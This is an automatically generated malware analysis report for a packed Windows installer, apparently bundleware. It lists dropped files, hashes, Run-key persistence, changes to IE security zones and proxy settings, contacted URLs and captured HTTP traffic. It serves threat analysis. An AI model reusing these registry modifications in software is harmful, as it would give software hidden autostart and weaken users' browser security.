Sample_002f865ab6

by malwarelabrobot on January 12th, 2015 in Malware Descriptions.

mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 002f865ab6cd2f05ca23808cbb09ebe3
SHA1: f8884bd41e88bfbe8c233259bba0b144453284f1
SHA256: 015f9407073db73916086c6cf68eb3e02a90dcded9db98f24ede64cf4345958d
SSDeep: 12288:Fla8UjwZQHW1F/K6fBEtdK7WGCMnA0xfpfx1k:Fl2w HspEvK7WGCwAup51k
Size: 595291 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-06-19 00:33:27
Analyzed on: WindowsXP SP3 32-bit


Summary:

Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

install.exe:432
CreateShortcut.exe:1284
%original file name%.exe:772
KS1426.exe:2000
ksimekusu_zhim_007.exe:1896
OneDay.exe:604

The Malware injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process CreateShortcut.exe:1284 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files%\Favorite\ico\ay.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\影视大全.lnk (1 bytes)
%Program Files%\Favorite\ico\123.ico (3 bytes)
%Program Files%\Favorite\ico\360.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\搜狗网址导航.lnk (1 bytes)
%Program Files%\Favorite\ico\tb1.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (13218 bytes)
%Documents and Settings%\%current user%\Desktop\hao123网址导航.lnk (1 bytes)
%Program Files%\Favorite\ico\sg1.ico (9 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explroer.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\360网址导航.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\爱淘宝.lnk (1 bytes)
%Program Files%\Favorite\ico\movie.ico (12536 bytes)
%Program Files%\Favorite\ico\ie.ico (784 bytes)
%Program Files%\Favorite\ico\23451.ico (9 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4.tmp (0 bytes)

The process %original file name%.exe:772 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\-2203_1_mp.exe (269650 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\CreateShortcut.exe (9276 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\ksimekusu_zhim_007.exe (230865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\Furt.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\apps.txt (1457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (20725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\OneDay.exe (108876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\NSISdl.dll (14 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)

The process ksimekusu_zhim_007.exe:1896 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files%\KS2015011116\V1426\msvcr100.dll (25824 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\中文之星双拼.ini (526 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\wordlib\sys.wlb (39329 bytes)
%Program Files%\KS2015011116\V1426\imeunit.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\默认主题\bg_main.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\默认主题\bg_status.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\提示.ini (960 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快速拼音输入法\设置.lnk (812 bytes)
%Program Files%\KS2015011116\V1426\atl100.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\nsis.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (285959 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzjf.dat (784 bytes)
%Program Files%\KS2015011116\V1426\install.exe (1856 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\蓝天双拼.ini (912 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\phrase\我的短语.ini (24 bytes)
%Program Files%\KS2015011116\V1426\imeword.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\拼音加加双拼.ini (538 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\默认主题\theme.ini (2 bytes)
%Program Files%\KS2015011116\V1426\msvcp100.dll (14184 bytes)
%Program Files%\KS2015011116\V1426\uninst.exe (838 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeSkin.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\默认主题\buttons.png (5 bytes)
%Program Files%\KS2015011116\V1426\DirectUI.dll (22192 bytes)
%Program Files%\KS2015011116\V1426\Library.dll (5064 bytes)
%Program Files%\KS2015011116\V1426\sqlite3.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\中文符号.ini (560 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\固顶字.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\双拼.ini (1 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeTool.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\j2f.dat (11048 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\智能ABC双拼.ini (686 bytes)
%Program Files%\KS2015011116\V1426\imetool.exe (6360 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\plugin.db (2 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeMini.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\DOS双拼.ini (674 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快速拼音输入法\修复.lnk (825 bytes)
%Program Files%\KS2015011116\V1426\config.exe (11344 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\menu_buttons.bmp (920 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\wordlib\user.wlb (3 bytes)
%Program Files%\KS2015011116\V1426\KS1426.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快速拼音输入法\卸载.lnk (613 bytes)
%System%\ksime.ime (126018 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\微软双拼.ini (682 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\phrase\系统短语库.ini (784 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\自然码双拼.ini (580 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzpy.dat (18424 bytes)
%Program Files%\KS2015011116\V1426\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeWord.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\默认主题\line.png (143 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeUnit.dll (2392 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\nsis.dll (0 bytes)

The process OneDay.exe:604 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FNHI9HC7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1G36EQJN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\20DNL7ZC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\VBTRRG9A\desktop.ini (67 bytes)

Registry activity

The process install.exe:432 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Ime File" = "KSIME.IME"
"Layout File" = "kbdus.dll"

[HKU\.DEFAULT\Keyboard Layout\Preload]
"2" = "E0200804"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"Layout" = "E0200804"

[HKCU\Keyboard Layout\Preload]
"2" = "E0200804"

[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Layout Text" = "快速拼音输入法"

The process CreateShortcut.exe:1284 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 85 2E 8A 86 6A D3 5B 60 0F 67 73 E0 9A F5 78"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process %original file name%.exe:772 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 C4 E6 03 D2 AC 58 0C E4 5E 45 06 D5 29 06 49"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process KS1426.exe:2000 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 95 C7 8D 1B 13 6F DE E5 23 8F 93 9A 07 1C 8E"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"Config" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
"Count" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"CRand" = "433"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process ksimekusu_zhim_007.exe:1896 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\JisuSoft\KusuInput\3.0]
"Qudao" = "ksimekusu_zhim_007"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy9.tmp\nsis.dll,"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"Count" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"Proc" = "KS1426.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\快速拼音输入法]
"DisplayIcon" = "%Program Files%\KS2015011116\V1426\KS1426.exe"

[HKCR\JiSu.file\DefaultIcon]
"(Default)" = "%Program Files%\KS2015011116\V1426\config.exe,0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\快速拼音输入法]
"UninstallString" = "%Program Files%\KS2015011116\V1426\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"date" = "20150111"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\快速拼音输入法]
"DisplayName" = "快速拼音输入法 3.0.3.9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\JiSu.file\shell\open\command]
"(Default)" = "%Program Files%\KS2015011116\V1426\config.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\.wlb]
"(Default)" = "JiSu.file"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\快速拼音输入法]
"Publisher" = "cxmx, Inc."

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\JiSu.file\shell\open]
"(Default)" = "安装字库"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\快速拼音输入法]
"DisplayVersion" = "3.0.3.9"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"InstallDir" = "%Program Files%\KS2015011116\V1426"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\快速拼音输入法]
"URLInfoAbout" = "http://jiguangshurufa.com/"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 28 FE 77 6C CB 17 F1 B2 9E 76 A7 C5 65 8D BA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\JiSu.file]
"(Default)" = "字库文件 (.wlb)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ksinput.exe]
"(Default)" = "%Program Files%\KS2015011116\V1426\KS1426.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\JiSu.file\shell]
"(Default)" = "open"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\JisuSoft\KusuInput\3.0]
"Entry" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Malware modifies IE security zone settings so that all local web-nodes (names without dots) that are not assigned to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Malware modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To run itself automatically each time Windows boots, the Malware adds a link to its file under the following registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"

The Malware modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To run itself automatically each time Windows boots, the Malware adds a link to its file under the following registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process OneDay.exe:604 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA CD 70 C1 06 21 03 54 44 44 C9 F0 FD 65 86 A3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

Dropped PE files

MD5 File path
6db1aab5dd1729e9045917fcc5c7a9bd c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeMini.dll
e96186aaa638e2968eed3361f61ab0d5 c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeSkin.dll
1d56753feda1d359317f39cd2926776d c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeTool.dll
56c833a0a45ebc14e2bf0230fe8c4678 c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeUnit.dll
293fe7132d2b950a6c4ee85b0f06a3ce c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeWord.dll
9ec7343e965f1f5da63daa34515be40e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\CreateShortcut.exe
678e0ebb76fd1af1fce5ac082d682f94 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\Furt.exe
254f13dfd61c5b7d2119eb2550491e1d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\NSISdl.dll
d2acd1407a3d27c309ce750b97e13d77 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\OneDay.exe
144bd6f3a3e1e040ffb03648e49c366d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\ksimekusu_zhim_007.exe
bacbca35f6b7e759fff3c6321f6f1b2a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy9.tmp\nsis.dll
0e40d4a64f7f3637b3efb0ecbe645a6c c:\Program Files\KS2015011116\V1426\DirectUI.dll
2ac6987d52efc4e43955da4f3fb855e8 c:\Program Files\KS2015011116\V1426\KS1426.exe
ad42f2f8f08c085a04f2fd0d6b472176 c:\Program Files\KS2015011116\V1426\Library.dll
36d7d05505951f542922df4c725cc57d c:\Program Files\KS2015011116\V1426\atl100.dll
bea1a8d84f1d871c237b5634a7819047 c:\Program Files\KS2015011116\V1426\config.exe
1302954a19e63cb334c3e6a423caea0c c:\Program Files\KS2015011116\V1426\imetool.exe
ad41cb4c1277817b46d75f1af6aee58e c:\Program Files\KS2015011116\V1426\imeunit.exe
5d5609e55fefeff66ea45e524b422d56 c:\Program Files\KS2015011116\V1426\imeword.exe
9389d5662768d7abc078aecf51deada7 c:\Program Files\KS2015011116\V1426\install.exe
03e9314004f504a14a61c3d364b62f66 c:\Program Files\KS2015011116\V1426\msvcp100.dll
67ec459e42d3081dd8fd34356f7cafc1 c:\Program Files\KS2015011116\V1426\msvcr100.dll
bacbca35f6b7e759fff3c6321f6f1b2a c:\Program Files\KS2015011116\V1426\nsis.dll
ee68b052a08fec0f574f2dae2003df27 c:\Program Files\KS2015011116\V1426\sqlite3.dll
6dec6339ba7414dbee3b372ab94115a8 c:\Program Files\KS2015011116\V1426\uninst.exe
1cc5717f5e506daeb628506f10954788 c:\WINDOWS\system32\ksime.ime

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: uscter
Product Version:
Legal Copyright: ???? (C) 2014
Legal Trademarks:
Original Filename: uscter setup
Internal Name: uscter setup
File Version:
File Description:
Comments:
Language: Chinese (Simplified, PRC)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23488 23552 4.48909 7ebfade271f75cb4c180603ab653af42
.rdata 28672 4496 4608 3.59139 9d6e96915262c9d1129a16fa0b02a19a
.data 36864 110456 1024 3.27356 dbf10679c897d0edeee280fffdad552f
.ndata 147456 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 188416 34600 34816 3.26755 727c03c4b9eda9d853630881e7a4752c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.google.uscter.hk.moyan.cc/db/apps.txt 124.232.146.41
hxxp://srftj.xmzs8.com/tongji.php?k=803cd96c0f74b9b3be5d61ee009ac9673b26d0ff0a4142acff7f40d8c5529bf151cc9b398f4910825321ddaf9ec9b80c3beaa32eed80a712eeb06f6b021af12ea3b9765c2819b1affd09c5cf3c47bed4 219.129.237.13


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
GPL SHELLCODE x86 NOOP

Traffic

GET /tongji.php?k=803cd96c0f74b9b3be5d61ee009ac9673b26d0ff0a4142acff7f40d8c5529bf151cc9b398f4910825321ddaf9ec9b80c3beaa32eed80a712eeb06f6b021af12ea3b9765c2819b1affd09c5cf3c47bed4 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: WINNET
Host: srftj.xmzs8.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 11 Jan 2015 14:27:47 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17p1
2..ok..0..HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Sun, 11 Jan 201
